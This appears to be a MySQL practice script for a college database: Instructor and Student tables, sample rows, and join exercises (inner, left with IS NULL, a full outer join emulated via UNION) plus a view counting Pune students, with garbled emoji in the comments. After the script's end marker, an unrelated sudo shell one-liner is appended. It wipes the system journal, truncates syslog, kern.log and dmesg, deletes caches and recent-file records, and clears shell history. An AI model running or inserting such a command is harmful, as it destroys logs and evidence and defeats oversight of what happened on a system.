
-- 1ï¸âƒ£ Create Database
CREATE DATABASE IF NOT EXISTS CollegeDB;
USE CollegeDB;

-- 2ï¸âƒ£ Create Tables
CREATE TABLE Instructor (
  instructorid INT PRIMARY KEY,
  instructorname VARCHAR(50),
  instructorcity VARCHAR(50),
  specialization VARCHAR(50)
);

CREATE TABLE Student (
  studentid INT PRIMARY KEY,
  studentname VARCHAR(50),
  instructorid INT,
  studentcity VARCHAR(50),
  FOREIGN KEY (instructorid) REFERENCES Instructor(instructorid)
);

-- 3ï¸âƒ£ Insert Sample Data
INSERT INTO Instructor VALUES
(1, 'Dr. Mehta', 'Pune', 'Computer'),
(2, 'Dr. Sharma', 'Delhi', 'Maths'),
(3, 'Dr. Verma', 'Mumbai', 'Physics'),
(4, 'Dr. Rao', 'Pune', 'Computer');

INSERT INTO Student VALUES
(101, 'Ravi', 1, 'Pune'),
(102, 'Priya', 2, 'Delhi'),
(103, 'Ankit', NULL, 'Nashik'),
(104, 'Sneha', 4, 'Pune'),
(105, 'Amit', NULL, 'Mumbai');

-- ===========================
-- ðŸ”¹ 1. Find the instructor of each student (INNER JOIN)
-- ===========================
SELECT s.studentid, s.studentname, i.instructorname
FROM Student s
INNER JOIN Instructor i
ON s.instructorid = i.instructorid;

-- ===========================
-- ðŸ”¹ 2. Find the students who are not having any instructor (LEFT JOIN + IS NULL)
-- ===========================
SELECT s.studentid, s.studentname
FROM Student s
LEFT JOIN Instructor i
ON s.instructorid = i.instructorid
WHERE i.instructorid IS NULL;

-- ===========================
-- ðŸ”¹ 3. Find students who have no instructor AND instructors who have no students (FULL OUTER JOIN via UNION)
-- ===========================
SELECT s.studentid, s.studentname, i.instructorname
FROM Student s
LEFT JOIN Instructor i
ON s.instructorid = i.instructorid
WHERE i.instructorid IS NULL
UNION
SELECT s.studentid, s.studentname, i.instructorname
FROM Student s
RIGHT JOIN Instructor i
ON s.instructorid = i.instructorid
WHERE s.instructorid IS NULL;

-- ===========================
-- ðŸ”¹ 4. Find the students whose instructor specialization is 'Computer'
-- ===========================
SELECT s.studentid, s.studentname, i.instructorname, i.specialization
FROM Student s
INNER JOIN Instructor i
ON s.instructorid = i.instructorid
WHERE i.specialization = 'Computer';

-- ===========================
-- ðŸ”¹ 5. Create a view of total number of students whose instructor belongs to 'Pune'
-- ===========================
CREATE OR REPLACE VIEW PuneInstructorStudents AS
SELECT COUNT(*) AS TotalStudents
FROM Student s
INNER JOIN Instructor i
ON s.instructorid = i.instructorid
WHERE i.instructorcity = 'Pune';

-- Display the View
SELECT * FROM PuneInstructorStudents;

-- ===========================
-- âœ… END OF SCRIPT
-- ===========================





sudo journalctl --rotate && sudo journalctl --vacuum-time=1s && \
sudo truncate -s 0 /var/log/syslog /var/log/kern.log /var/log/dmesg 2>/dev/null && \
sudo rm -rf /run/udev/data/* ~/.cache/* ~/.local/share/recently-used.xbel 2>/dev/null && \
history -c && history -w